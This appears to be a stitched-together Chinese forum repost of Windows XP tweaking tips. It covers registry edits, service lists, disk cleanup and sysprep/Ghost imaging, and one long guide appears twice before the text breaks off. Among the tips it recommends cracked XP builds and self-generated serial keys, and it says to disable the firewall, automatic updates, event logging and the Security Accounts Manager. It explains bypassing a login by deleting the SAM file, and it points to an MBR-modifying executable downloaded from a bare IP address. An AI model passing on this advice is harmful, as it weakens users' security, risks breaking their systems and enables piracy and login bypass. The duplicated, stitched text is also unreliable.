在〔开始〕\〔运行〕\键入〔regedit〕\〔HKEY_CURRENT_USER〕\〔Software〕\〔Microsoft〕\〔Internet Explorer〕\在〔Main〕增加一个字符串值〔Enable AutoImageResize〕数据数值为〔NO〕

让 IE6 可以同时下载超过两个档案：
Internet Explorer 6 同时最多只可以下载两个档案，
按下修改可同时下载多达十个档案
在〔开始〕\〔运行〕\键入〔regedit〕\〔HKEY_CURRENT_USER〕\〔\Software〕\〔Microsoft〕\〔Windows〕\〔CurrentVersion〕\〔InternetSettings〕
在右边窗口增加下列两个〔Dword〕值
〔MaxConnectionsPer1_0Server〕数值资料为〔0000000a〕即十进制〔10〕
〔MaxConnectionsPerServer〕数值资料为〔0000000a〕即十进制〔10〕
重新启动计算机生效
[转帖]我的WinXP优化之路［推荐］
转贴］我的WinXP优化之路［推荐］

为了达到这个目的，我们主要从四个方面入手：
1、减少磁盘空间占用
2、终止不常用的系统服务
3、安全问题
4、另外一些技巧
首先问一下，你是不是很想激活XP，不。。。准确的说你是不是想在ms的站上能够升级。如果答案是肯定的话，那我们就先来探讨一下安装的问题，目前流行的V4、V5、V6版本我还是比较推荐的，尤其是V5和V6这两个。安装的过程中有个序列号的问题，我建议你先在机子上算好，然后用这个序列号安装，通常这样安装的XP都可以到MS的站点自由更新。
如果你是已经安装好的XP了，但用的序列号是里到处流传人人都用的那些，也没关系，我们后面会说用sysrep来重新封装的时候会解决序列号更换的问题。

我假设你已经安装完XP了，come on baby ~~

一、瘦身行动

1、在各种软硬件安装妥当之后，其实XP需要更新文件的时候就很少了。删除系统备份文件吧：开始→运行→sfc.exe /purgecache 近3xxM。

2、删除驱动备份： %windows%\driver cache\i386目录下的driver.cab文件，通常这个文件是76M。

3、偶没有看help的习惯，所以保留着%windows%\help目录下的东西对我来说是一种伤害，呵呵。。。都干掉，近4xM。

4、一会在升级完成后你还会发现%windows%\多了许多类似$NtUninstallQ311889$这些目录，都干掉吧，1x-3xM。

5、正好硬盘中还有win2000/server等，所以顺便把pagefile.sys文件都指向一个地方：控制面板→系统→性能—高级→虚拟内存→更改，注意要点“设置”才会生效。

6、卸载不常用组件：用记事本修改\%windows%\inf\sysoc.inf，用查找/替换功能，在查找框中输入,hide，全部替换为空。这样，就把所有的,hide都去掉了，存盘退出后再运行“添加-删除程序”，就会看见“添加/删除 Windows 组件”中多出不少选项；删除掉游戏啊，码表啊等不用的东西。

7、刪除\windows\ime下不用的輸入法，8xM。我重新安装了自己用的zrm输入法，赫赫。

8、如果实在空间紧张，启用NTFS的压缩功能，这样还会少用2x% 的空间，不过我没作。

9、关了系统还原，这破功能对我这样常下载、测试软件的人来说简直是灾难，用鼠标右健单击桌面上的“我的电脑”，选择“属性”，找到“系统还原”，选择“在所有驱动器上关闭系统还原”呵呵，又可以省空间了。

10、还有几个文件，挺大的，也没什么用。。。。忘了名字 ：（ ，刚安装的系统可以用查找功能查找大于50M的文件来看看，应该能找到的。

如果你能按照上面的过程做完，你的原本1.4G的XP，完全可以减少到800以下。

二、加速计划

WinXP的启动会有许多影响速度的功能，尽管ms说已经作最优化处理过，但对我们来说还是有许多可定制之处。我一般是这样来做的。

1、修改注册表的run键，取消那几个不常用的东西，比如Windows Messenger 。启用注册表管理器：开始→运行→Regedit→找到“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\MSMSGS” /BACKGROUND 这个键值，右键→删除，世界清静多了，顺便把那几个什么cfmon的都干掉吧。

2、修改注册表来减少预读取，减少进度条等待时间，效果是进度条跑一圈就进入登录画面了，开始→运行→regedit启动注册表编辑器，找HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters， 有一个键EnablePrefetcher把它的数值改为“1”就可以了。另外不常更换硬件的朋友可以在系统属性中把总线设备上面的设备类型设置为none（无）。

3、关闭系统属性中的特效，这可是简单有效的提速良方。点击开始→控制面板→系统→高级→性能→设置→在视觉效果中，设置为调整为最佳性能→确定即可。这样桌面就会和win2000很相似的，我还是挺喜欢XP的蓝色窗口，所以在“在窗口和按钮上使用视觉样式”打上勾，这样既能看到漂亮的蓝色界面，又可以加快速度。

4、我用Windows commadner＋Winrar来管理文件，Win XP的ZIP支持对我而言连鸡肋也不如，因为不管我需不需要，开机系统就打开个zip支持，本来就闲少的系统资源又少了一分，点击开始→运行，敲入：“regsvr32 /u zipfldr.dll”双引号中间的，然后回车确认即可，成功的标志是出现个提示窗口，内容大致为：zipfldr.dll中的Dll UnrgisterServer成功。

5、据说XP的一个系统服务Qos，这个调度要占用一定的网络带宽，像我这样的一毛不拔的人是无法忍受的，去掉方法是：开始菜单→运行→键入 gpedit.msc ，出现“组策略”窗口， 展开 "管理模板”→“网络” ， 展开 "QoS 数据包调度程序"， 在右边窗右键单击“限制可保留带宽" ，在属性中的“设置”中有“限制可保留带宽" ，选择“已禁用”，确定即可。当上述修改完成并应用后，用户在网络连接的属性对话框内的一般属性标签栏中如果能够看到"QoS Packet Scheduler（QoS 数据包调度程序）"。说明修改成功，否则说明修改失败，顺便把网络属性中的那个Qos 协议也一起干掉（卸载）吧。

6、快速浏览局域网络的共享
通常情况下，Windows XP在连接其它计算机时，会全面检查对方机子上所有预定的任务，这个检查会让你等上30秒钟或更多时间。去掉的方法是开始→运行→Regedit→在注册表中找到HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Current Version\Explorer\RemoteComputer\NameSpace。在此键值下，会有个{ D6277990-4C6A-11CF-8D87-00AA0060F5BF }键，把它删掉后，重新启动计算机，Windows XP就不再检查预定任务了，hoho~~~ ，速度明显提高啦！

7、关掉调试器Dr. Watson
我好像从win95年代开始一次也没用过这东西，可以这样取消：打开册表，找到HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AeDebug子键分支，双击在它下面的Auto键值名称，将其“数值数据”改为0，最后按F5刷新使设置生效，这样就取消它的运行了。沿用这个思路，我们可以把所有具备调试功能的选项取消，比如蓝屏时出现的memory.dmp，在“我的电脑→属性→高级→设置→写入调试信息→选择无”等等。

8、被我终止的服务列表以及相关说明

1)alerter 错误警报
2)automatic updates windows 自动更新
3)background intelligent transfer service 微软说使用空闲的网络带宽传数据
4)clipbook 与远程电脑来共享剪贴板内容，我看还是免了吧
5)Computer browser　说什么要维护网络更新列表
6)DHCP client 我不需要这东西
7)Distributed link tracking client 保持局域网连接更新等信息，偶很少用局域网，这东西占用４M左右内存。
8)Distributed Transaction coordinator 协调xxx，和上面的差不多
9)DNS Client 我不需要这东西
10)Error reporting service 错误报告
11)Event Log 系统日志纪录
12)Fast user switching compatibility 用户切换
13)help and support 帮助
14)Human interface device access 据说是智能设备。。。
15)IMAPI CD-burning COM service　偶不用这个刻碟
16)Indexing service 索引，索引什么呢？
17)Internet Connection Firewall(ICF) ICF防火墙
18)IPSEC Services 这个我不懂，你想知道问Quack去
19)Logical Disk manager administrative service 配置磁盘
20)messenger 好像net send 等东西用的就是这个功能
21)MS software shadow copy provider 卷复制备份的
22)Net Logon 我可不想让黑客远程登录进来，关！
23)Netmeeting remote desktop sharing 我不用netmeeting
24)Network DDE　 动态数据交换传输
25)Network DDE DSDM　和上面差不多
26)Network Location Awareness 关，我的机子不作共享
27)NTLM Security support provider－telnet　呵呵，关！
28)Performance logs and alert 将系统状态写日志或发警告
29)Portable media serial number 关！
30)Print Spooler 打印机，不幸的是我的机子不连接Print ~
31) QoS RSVP 关！
32)Remote desktop help session manager 远程帮助服务
33)remote Procedure Call LOCATOR 管理RPC
34)remote registry 远程管理注册表
35)removable storage
36)routing and remote access 我干脆禁用了它
37)security accounts manager 我的系统只是一个客户系统，不用iis。
38)smart card
39)smart card helper 关！！！
40)SSDP Discovery service 我用不到这个
41)system event notification 如果是服务器肯定要记录的
42)system restore service 系统还原服务
43)task scheduler windows 计划服务
44)Telephony 拨号服务，我不拨号还不行吗？
45)telnet
46)terminal services 终端服务
47)uninterruptible power supply UPS，我没有呀
48)universal plug and play device host 太先进了点，用不到
49)upload manager 关了也能传输文件的
50)volume shadow copy 又是备份，晕
51)webclient 没用过
52)Windows Installer ＭＳＩ服务，我一直关着。
53)windows image acquisition (WIA) 数码设备用的
54)windows management instrumentation driver extensions 关了
55)windows time 时间服务
56)wireless zero configuration 无线网络，偶用不到的
57)WMI perfromance adapter 关！

这里面的一些服务是刚开始就是关的，但我忘了，所以只好把现在系统中关闭的服务基本都列了出来。你根据自己的情况酌情处理吧。

三、我安全吗

多了不谈，基本的共享还是得关的：

修改注册表为以下两个样式：
去除共享
——————————————————————
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters]
"AutoShareServer"=dword:00000000
"AutoSharewks"=dword:00000000
——————————————————————
去除IPC$管理
——————————————————————
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
"restrictanonymous"=dword:00000001
——————————————————————
或者将上面两个保存成个.REG文件，然后双击导入就可以了。

顺便把不要脸的的3721也屏蔽，在hosts文件中加入：

127.0.0.1 cnsmin.3721.com
127.0.0.1 http://www.3721.net

四、其他技巧

1、给鼠标右键增加个复制到.../移动到...功能
—————————————————————
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shellex]

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shellex\ContextMenuHandlers]

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shellex\ContextMenuHandlers\Copy To]
@="{ C2FBB630-2971-11D1-A18C-00C04FD75D13 }"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shellex\ContextMenuHandlers\Move To]
@="{ C2FBB631-2971-11D1-A18C-00C04FD75D13 }"
————————————————————————
将上面内容保存成add.reg文件，然后双击导入就可以了。

2、关了错误报告，KAO ！这东西搞得我像个微软免费的测试员似的：点击控制面板---->系统---->高级---->右下角--->错误报告---->禁用错误汇报——>确定！
3、取消分组显示：右键单击任务栏的空白区域，在弹出的菜单中选择“属性”，在弹出的窗口中，取消“分组相似任务栏按钮”前面的对钩，确定就可以了。
4、找回经典的登录窗口，WinXP默认的登录界面虽然漂亮，但如果你想用一个列表中没有的用户登录，你会发现无从下手，改回经典窗口的方法是：点击“开始”→“控制面板”→“用户账户”→“更改用户登录或注销的方式”→把“使用欢迎屏幕”前面的对钩取消，最后点“应用选项”就OK啦。
5、将自己最常用的输入法设置一个快捷键：点击“开始”→“控制面板”→“区域和语言选项”→在弹出的窗口中选择“语言”→“详细信息”→“键设置”在弹出的窗口中找到自己用的输入法，点“更改按键顺序”→在这里选一个快捷键就可以了。
6、关闭计算机时自动结束不响应的任务，注册表：HKEY_CURRENT_USER\Control Panel\Desktop 中的“AugoEndTasks”的键值改为“1”
7、关闭自动更新：右键单击“我的电脑”，点击属性，点击“自动更新”，在“通知设置”一栏选择“关闭自动更新。我将手动更新计算机”一项。
8、减少开机磁盘扫描等待时间，开始→运行，键入“chkntfs/t:0”

然后连接到ms站点顺便升级一次就算优化基本完成，对于XP而言，可以采用许多内部命令来看看优化情况，比如tasklist.exe /svc 可以查看系统服务实际使用情况。
优化一个系统，挺麻烦的。所以我们把他保存起来，我们用Ghost生成.GHO文件，这样就可以拿给别人炫耀一下啦，在Ghost之前先要作一个事情，清除系统硬件、注册等信息，否则克隆到不同的机子上将无法启动，在Winxp安装盘上找Deploy.cab 中的sysprep.exe文件。
执行sysprep.exe，选择“重新封装”，下面的标记中可以选择“已提前激活”，还可以选择封装完成后是关机还是重新启动。封装完成后，我们再用带有Ghost的系统盘启动，用Ghost来生成备份.GHO镜像，备份完成！
在执行封装后，重新开机，XP会让我们输入序列号，文中开头所提到的换序列号的办法就是这样换。

Windows XP最新应用技巧大荟萃
                          Windows XP最新应用技巧大荟萃
1.恢复EXE文件关联
    EXE文件关联出错非常的麻烦，
因为这种情况的出现多是由于病毒引起的，而杀毒软件的主文件都是EXE文件，既然EXE文件关联出错，又怎能运行得了杀毒软件呢？还好XP提供了安全模式下的命令行工具供我们使用，可以利用命令行工具来解决这个问题。
    在安全模式下输入：assoc<空格>.exe=exefile<回车>，屏幕上将显示“.exe=exefile”。现在关闭命令提示符窗口，按Ctrl+Alt+Del组合键调出“Windows安全”窗口，按“关机”按钮后选择“重新启动”选项，按正常模式启动Windows后，所有的EXE文件都能正常运行了！
3.更改Windows XP序列号
    在Windows XP安装完毕以后，
可能由于某些原因你又想在已经安装完毕的Windows XP上更改序列号，该怎么办呢？使用激活向导可以满足你的要求。开始之前，强烈建议你在修改之前作一个系统还原点，以免误操作引起不必要的麻烦。

    点击“开始”→“运行”，输入regedit后回车，打开注册表编辑器，定位到HKEY_LOCAL_MACHINE＼Software＼Microsoft＼WindowsNT＼Current Version＼WPAEvents，在右边右键单击OOBETimer，然后选择修改，至少修改一个字节，确定保存。

    点击“开始”→“运行”，输入%systemroot%＼system32＼oobe＼msoobe.exe /a，选择通过电话激活以后点击“下一步”，点击修改序列号，输入新的序列号以后选择“更新”，如果退回到前一个画面，那么选择稍后激活，并重新启动，反复前面的步骤直到修改成功为止，重新激活。点击确定，安装SP1。

    如果你安装SP1以后不能重新启动，那么启动的时候按F8，选择使用“最后一次正确的配置”，然后重复以上流程。本方法适用于Windows XP Professional。

    4.将EFS选项添加至快捷菜单

    Windows XP所配备的加密文件系统(EFS)，可帮助您针对存储在NTFS磁盘卷上的文件和文件夹执行加密操作。如果您已将这个文件加密/解密选项添加至快捷菜单，那么，当用户右键单击某一存储于NTFS磁盘卷上的文件或文件夹时，加密或解密选项便会出现在随后弹出的快捷菜单上。请注意Windows XP Home Edition(家用版)并未提供EFS特性。

    如欲将EFS选项添加至快捷菜单，请依次执行下列操作步骤：在“运行”对话框内输入regedit，展开注册表至下列子键：HKEY_LOCAL_MACHINE＼SOFTWARE＼Microsoft＼Windows＼CurrentVersion＼Exporer＼Advanced，在“编辑”菜单上指向“新建”，并单击“DWORD值”，输入EncryptionContextMenu为变量名，并将该变量赋值为1。为确保对注册表进行修改，应在自己的计算机上拥有管理员帐号。

    5.XP选程桌面漏洞解决办法

    Windows XP提供了远程桌面功能，目前被证实存在设计缺陷，可能导致攻击者得到系统远程桌面的账户信息，有助于其进一步攻击。当连接建立的时候，用Windows XP远程桌面把账户名以明文发送给连接它的客户端。发送的账户名不一定是远端主机的用户账号，而是最常被客户端使用的账户名，网络上的嗅探程序可能会捕获到这些账户信息。

    解决方法：到微软主页下载相应的补丁程序，并暂时停止远程桌面的使用，方法是：右键单击“我的电脑”，选择“属性”，在弹出的窗口中，选“远程”标签，勾掉“允许用户远程连接到这台计算机”复选框前的钩，点“确定”即可。

    6.制作密码重设盘

    密码在Windows XP里面是很重要的，但是如果你忘记了没法登陆怎么办？如果你创建了“密码重设盘”，问题就会迎刃而解。在“控制面板”中打开用户帐户，单击您的帐户名，在位于窗口左侧的“相关任务”下面，单击“防止忘记密码”，选择下一步，提示需要一张磁盘，准备一张空白的磁盘插入软驱里面，继续下一步，出现下面输入当前账户的密码以后（图4），按“下一步”即可开始创建，如果你以后忘记了密码，在出现欢迎屏幕时，单击用户名，然后键入密码。如果忘记了密码，则会显示“您是否忘记了自己的密码？”消息，单击“使用密码重设盘”可启动“密码重设向导”，按照“密码重设向导”中的指示，创建新密码，使用新密码登录，然后将密码重设盘收藏到安全地方，以备将来需要重设密码时使用，不必制作新的密码重设盘。

  7.解决因DirectX产生的错误

    如果你在电脑操作中频繁收到DirectDraw错误消息，
则可尝试应用“DirectX诊断工具”解决问题。运行开始菜单中的“附件”→“系统工具”→“系统信息”，在显示的程序界面中，点击菜单栏上的“工具”→“DirectX诊断工具”(图5)，其后，在弹出窗口中切换到“显示”标签页，在此查看“DirectX功能”项目，分别测试当前设备上的DircetDraw及Direct3D，若有问题则禁用此项功能。

  8.使用增加的磁盘工具

    在XP中大家熟悉的ScanDisk没有了，许多人对此很不适应，而且觉得很奇怪，其实，Windows XP中已经包含一个增强了的磁盘工具：Check Disk。因此ScanDisk也没必要存在了。如果想使用Check Disk：打开我的电脑，右键点击一个驱动器，选择“属性”。在“工具”选项卡上，在检查错误下，点击“现在检查”。如果想从命令行检查磁盘分区，可以用chkdsk c:这样的格式。

    9.忘记登陆口令的解决办法

    XP对用户安全性的审核即是非常严格的，要是你忘记了设置的口令，可别以为能够像Windows98那样选择“取消”就可以进入系统，这一点相信安装过Windows XP的朋友是很清楚的。由于没有登陆口令，无法进入系统，许多朋友无奈之下选择了重新安装Windows XP的办法，但这种方法既繁琐又费时费力，其实不必那么麻烦的。

    大家知道，Windows 2000/XP中对用户帐户的安全管理使用了安全帐号管理器(Security Account Manager,SAM)的机制，安全帐号管理器对帐号的管理是通过安全标识进行的，安全标识在帐号创建时就同时创建，一旦帐号被删除，安全标识也同时被删除。安全标识是唯一的，即使是相同的用户名，在每次创建时获得的安全标识都时完全不同的。因此，一旦某个帐号被删除，它的安全标识就不再存在了，即使用相同的用户名重建帐号，也会被赋予不同的安全标识，不会保留原来的权限。

    安全账号管理器的具体表现就是%SystemRoot%＼system32＼config＼sam文件。SAM文件是Windows NT/2000/XP的用户帐户数据库，所有用户的登录名及口令等相关信息都会保存在这个文件中。知道了这些我们的解决办法也产生了：在系统启动前，插入启动盘，进入C:＼WINNT＼System3＼Config＼，用ren命令将SAM文件改名，或用del命令将SAM文件删除，重启电脑即可。改名或删除SAM文件以后，试用Administrator登录，密码为空，成功了。

    10.字体安装的优化

    有些朋友需要安装各种不同的字体，但是有些字体本身很大，特别是中文字体，一般在10M左右，一旦安装过多的字体，会使系统盘臃肿不堪，其实，从Win98到WinXP，都可以在安装的时候做一点优化，效果就是不再把新字体拷贝到系统盘。

    以WinXP为例，我们在一个空白的驱动器上建立一个目录：NewFonts(名字、驱动器名字任意定)，然后把全部需要安装的字体放到这个目录里面，然后在“开始”→“运行”里面输入fonts，打开字体目录，依次打开“文件”→“安装新字体”，在出现的对话框里面找到D:＼NewFonts这个目录，然后去掉“将字体复制到Fonts文件夹”前面的“√”(图6)，最后选中要安装的字体，确定即可。

11.声音提示切换键

    在你在进行大量英文/汉字输入的过程中，
大概经常会遇到误按切换键而导致输入频繁出错，从而降低工作效率的情况(特别是快速盲打)。如果我们为切换键设置了声音提示，就可有效地避免这一问题。在“控制面板”中，双击“辅助功能选项”图标，在弹出对话框中查看"键盘"标签页，在此勾选“切换键”项目中的“使用切换键”复选框，最后点击“确定”使设置升效(图7)。

  12.时间校正自动化

    要是Win XP系统下的时钟突然不准了怎么办？相信大多数人都会选用手工方式来重新将时间校准；可惜，无论我们怎么细心，用手工方式总是无法实现精确校时的。要想精确对时钟进行校时的话，我们可以利用下面的方法来实现：

    直接用鼠标双击系统任务栏托盘区中的系统时钟图标，打开“Internet时间”标签页面，在其中选择一台标准的时间服务器，单击确定按钮后，系统自动连接到因特网上，并自动比较计算机内的系统时钟与指定服务器的时钟，要是发现不准确的话就可以自动调整了。不过要想调整精确的话，必须确保自己的系统没有安装防火墙。

    13.XP也可磁盘扫描

    不知何数，在Windows XP之中没有为我们提供磁盘扫描的功能，这给我们对磁盘整理带来了一些不便。为了解决这个，经过潜心研究终于找出了解决方法。

    在“我的电脑”中右击想进行扫描检测的分区，打开其属性对话框，然后切换到“工具”标签，在“查错”区域点击“开始检查”按钮，在随后打开的对话框中选中“自动修复文件系统错误”、“扫描并试图恢复坏扇区”两个选项(图8)，然后点击“开始”按钮即可。

  14.禁止使用IE6下载文件

    有些时候我们需要禁止IE下载文件功能，但是一直苦于没有办法使用系统的设置，其实如果在注册表中稍作修改的话就可以满足大家的要求了。打开注册表编辑器，找到HKEY_CURRENT_USER＼Software＼Microsoft＼Windows＼CurrentVersion＼Internet Settings＼Zones＼3，然后在右边找到1803这个Dword值，双击修改为3即可。重新启动IE看看还能不能够下载的？如果要取消限制的话，只需要还原Dword值为0即可。

    15.利用光盘检测系统兼容性

    Windows XP作为目前个人安装使用的最新操作系统，在一些老爷机上经常会碰到安装过程出现不兼容的情况，使得安装过程到了一半就被迫结束。为了避免这种情况的发生，我们可以在安装Windows XP之前，借助其安装光盘来对系统的兼容性进行一些检测。

    将安装光盘放入光驱，一般都会自动打开欢迎使用界面(注：如果禁止光盘自动运行，我们可以执行光盘中的SETUP.EXE命令，同样可以打开)点击其界面上的最后一项“检查系统兼容性”然后点击“自动检查我的系统”，这样待上一会就会显示检查结果，汇报不兼容的项目，要想安装使用Windows XP就得先解决好这些不兼容的项目才行，免得中途被迫停止。

16.给Windows XP找回纯DOS

    有时我们不得不使用一些在纯DOS模式下工作的程序，但是在Windows XP中已经找不到纯DOS了，难道我们非得放弃这些在纯DOS下运行的程序吗？当然不是！利用下面的办法就可以让你在Windows XP中进入纯DOS模式。

    第一种方法：利用Win98

    在我们安装XP操作系统前，先用Windows 98启动盘启动系统，并通过sys c:命令向c盘传送系统。并将常用的DOS命令拷贝到硬盘中，然后按常规方法安装XP，当安装成功后，在启动菜单的默认菜单"Microsoft Windows XP"下会新增一个“Microsoft Windows”菜单项，选中此菜单项后，由于系统中没有安装Windows98系统，所以此时计算机就会自动转到DOS系统下，而且还是实模式的，这样就达到了我们的目的。

    第二种方法：采用start命令

    在Windows XP的命令解释符中输入：start/seperate要运行的程序，即可运行相应的DOS程序。其中参数separate的作用是在单独的内存空间启动16位程序，而用参数shared则是在共享的内存空间启动16位程序。当DOS程序运行后我们还可按Alt+Enter键在全屏幕与窗口之间进行切换。

    第三种方法：利用工具软件

    我们还可以使用一个小工具pqvf.exe来达到目的，该软件下载的地址是61.234.226.248/pqvf.exe。该软件是部分网友分析了PQ Magic的相关文件，并提取了部分文件制作的软件，可以让那些Windows XP用户迅速引导到纯DOS下，重新启动后又可以正常使用Windows XP启动。

    下载后的pqvf.exe文件是一个自解压程序，解压后的文件名字和作用如下：MBR.dat和restrmbr.exe这两个文件的主要作用是用来恢复硬盘的主引导记录的，作用与执行FDISK/mbr命令一样，可以清除主引导扇区而不改变分区表结构。Vfinst9x.exe用于在Windows 9x下启动纯DOS界面，VfinstNT.exe用于在Windows XP下启动纯DOS界面。pqvf.vfd中则包含有启动的软磁盘映像文件。

    具体方法是：直接运行VfinstNT.exe,vfinstNT.exe文件，它们会修改硬盘主引导记录，然后Windows XP会自动重新启动，重启动后你看到的盘符将是A:。敲入ver命令可以查看当前的DOS版本，显示的是“Windows 98(version 4.10.2222)”，看来已是纯DOS了！而且像himem.sys.emm386.exe、光驱驱动和鼠标驱动程序这样的必备驱动也安装了，并且还自动装上一个简单的汉字系统，完全可以应付一般的DOS应用了。如果想回到Windows XP界面，只要重新启动计算机就可以了。


WinXP优化之路 让WINXP和WIN98一样快

《一键清理系统垃圾》

WinXP优化之路 让WINXP和WIN98一样快

总体设想：让WinXP更苗条、性感、速度更快，使用更便捷。
    为了达到这个目的，我们主要从四个方面入手：

    1、减少磁盘空间占用

    2、终止不常用的系统服务

    3、安全问题

    4、另外一些技巧

    首先问一下，你是不是很想激活XP，不。。。准确的说你是不是想在ms的站上能够升级。如果答案是肯定的话，那我们就先来探讨一下安装的问题，目前流行的V4、V5、V6版本我还是比较推荐的，尤其是V5和V6这两个。安装的过程中有个序列号的问题，我建议你先在机子上算好，然后用这个序列号安装，通常这样安装的XP都可以到MS的站点自由更新。

    如果你是已经安装好的XP了，但用的序列号是里到处流传人人都用的那些，也没关系，我们后面会说用sysrep来重新封装的时候会解决序列号更换的问题。

    我假设你已经安装完XP了，come on baby ~~

    一、瘦身行动

    1、在各种软硬件安装妥当之后，其实XP需要更新文件的时候就很少了。删除系统备份文件吧：开始→运行→sfc.exe /purgecache近3xxM。

    2、删除驱动备份：%windows%\driver cache\i386目录下的driver.cab文件，通常这个文件是76M。

    3、偶没有看help的习惯，所以保留着%windows%\help目录下的东西对我来说是一种伤害，呵呵。。。都干掉，近4xM。

    4、一会在升级完成后你还会发现%windows%\多了许多类似$NtUninstallQ311889$这些目录，都干掉吧，1x-3xM。

    5、正好硬盘中还有win2000/server等，所以顺便把pagefile.sys文件都指向一个地方：控制面板→系统→性能—高级→虚拟内存→更改，注意要点“设置”才会生效。

    6、卸载不常用组件：用记事本修改%windows%\inf\sysoc.inf，用查找/替换功能，在查找框中输入,hide，全部替换为空。这样，就把所有的,hide都去掉了，存盘退出后再运行“添加-删除程序”，就会看见“添加/删除Windows组件”中多出不少选项；删除掉游戏啊，码表啊等不用的东西。

    7、h除\windows\ime下不用的入法，8xM。我重新安装了自己用的zrm输入法，赫赫。

    8、如果实在空间紧张，启用NTFS的压缩功能，这样还会少用2x%的空间，不过我没作。

    9、关了系统还原，这破功能对我这样常下载、测试软件的人来说简直是灾难，用鼠标右健单击桌面上的“我的电脑”，选择“属性”，找到“系统还原”，选择“在所有驱动器上关闭系统还原”呵呵，又可以省空间了。

    10、还有几个文件，挺大的，也没什么用。。。。忘了名字：(，刚安装的系统可以用查找功能查找大于50M的文件来看看，应该能找到的。

    如果你能按照上面的过程做完，你的原本1.4G的XP，完全可以减少到800以下。

    二、加速计划

    WinXP的启动会有许多影响速度的功能，尽管ms说已经作最优化处理过，但对我们来说还是有许多可定制之处。我一般是这样来做的。

    1、修改注册表的run键，取消那几个不常用的东西，比如Windows Messenger。启用注册表管理器：开始→运行→Regedit→找到“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\MSMSGS”/BACKGROUND这个键值，右键→删除，世界清静多了，顺便把那几个什么cfmon的都干掉吧。

    2、修改注册表来减少预读取，减少进度条等待时间，效果是进度条跑一圈就进入登录画面了，开始→运行→regedit启动注册表编辑器，找HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters，有一个键EnablePrefetcher把它的数值改为“1”就可以了。另外不常更换硬件的朋友可以在系统属性中把总线设备上面的设备类型设置为none(无)。

    3、关闭系统属性中的特效，这可是简单有效的提速良方。点击开始→控制面板→系统→高级→性能→设置→在视觉效果中，设置为调整为最佳性能→确定即可。这样桌面就会和win2000很相似的，我还是挺喜欢XP的蓝色窗口，所以在“在窗口和按钮上使用视觉样式”打上勾，这样既能看到漂亮的蓝色界面，又可以加快速度。

    4、我用Windows commadner＋Winrar来管理文件，Win XP的ZIP支持对我而言连鸡肋也不如，因为不管我需不需要，开机系统就打开个zip支持，本来就闲少的系统资源又少了一分，点击开始→运行，敲入：“regsvr32 /u zipfldr.dll”双引号中间的，然后回车确认即可，成功的标志是出现个提示窗口，内容大致为：zipfldr.dll中的Dll UnrgisterServer成功。

    5、据说XP的一个系统服务Qos，这个调度要占用一定的网络带宽，像我这样的一毛不拔的人是无法忍受的，去掉方法是：开始菜单→运行→键入gpedit.msc，出现“组策略”窗口，展开"管理模板”→“网络”，展开"QoS数据包调度程序"，在右边窗右键单击“限制可保留带宽"，在属性中的“设置”中有“限制可保留带宽"，选择“已禁用”，确定即可。当上述修改完成并应用后，用户在网络连接的属性对话框内的一般属性标签栏中如果能够看到"QoS Packet Scheduler(QoS数据包调度程序)"。说明修改成功，否则说明修改失败，顺便把网络属性中的那个Qos协议也一起干掉(卸载)吧。

    6、快速浏览局域网络的共享

    通常情况下，Windows XP在连接其它计算机时，会全面检查对方机子上所有预定的任务，这个检查会让你等上30秒钟或更多时间。去掉的方法是开始→运行→Regedit→在注册表中找到HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Current Version\Explorer\RemoteComputer\NameSpace。在此键值下，会有个D6277990-4C6A-11CF-8D87-00AA0060F5BF{}键，把它删掉后，重新启动计算机，Windows XP就不再检查预定任务了，hoho~~~，速度明显提高啦！

    7、关掉调试器Dr. Watson

    我好像从win95年代开始一次也没用过这东西，可以这样取消：打开册表，找到HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AeDebug子键分支，双击在它下面的Auto键值名称，将其“数值数据”改为0，最后按F5刷新使设置生效，这样就取消它的运行了。沿用这个思路，我们可以把所有具备调试功能的选项取消，比如蓝屏时出现的memory.dmp，在“我的电脑→属性→高级→设置→写入调试信息→选择无”等等。

8、被我终止的服务列表以及相关说明
    1)alerter错误警报

    2)automatic updates windows自动更新

    3)background intelligent transfer service微软说使用空闲的网络带宽传数据

    4)clipbook与远程电脑来共享剪贴板内容，我看还是免了吧

    5)Computer browser说什么要维护网络更新列表

    6)DHCP client我不需要这东西

    7)Distributed link tracking client保持局域网连接更新等信息，偶很少用局域网，这东西占用4M左右内存。

    8)Distributed Transaction coordinator协调xxx，和上面的差不多

    9)DNS Client我不需要这东西

    10)Error reporting service错误报告

    11)Event Log系统日志纪录

    12)Fast user switching compatibility用户切换

    13)help and support帮助

    14)Human interface device access据说是智能设备。。。

    15)IMAPI CD-burning COM service偶不用这个刻碟

    16)Indexing service索引，索引什么呢？

    17)Internet Connection Firewall(ICF) ICF防火墙

    18)IPSEC Services这个我不懂，你想知道问Quack去

    19)Logical Disk manager administrative service配置磁盘

    20)messenger好像net send等东西用的就是这个功能

    21)MS software shadow copy provider卷复制备份的

    22)Net Logon我可不想让黑客远程登录进来，关！

    23)Netmeeting remote desktop sharing我不用netmeeting

    24)Network DDE动态数据交换传输

    25)Network DDE DSDM和上面差不多

    26)Network Location Awareness关，我的机子不作共享

    27)NTLM Security support provider-telnet呵呵，关！

    28)Performance logs and alert将系统状态写日志或发警告

    29)Portable media serial number关！

    30)Print Spooler打印机，不幸的是我的机子不连接Print ~

    31) QoS RSVP关！

    32)Remote desktop help session manager远程帮助服务

    33)remote Procedure Call LOCATOR管理RPC

    34)remote registry远程管理注册表

    35)removable storage

    36)routing and remote access我干脆禁用了它

    37)security accounts manager我的系统只是一个客户系统，不用iis。

    38)smart card

    39)smart card helper关！！！
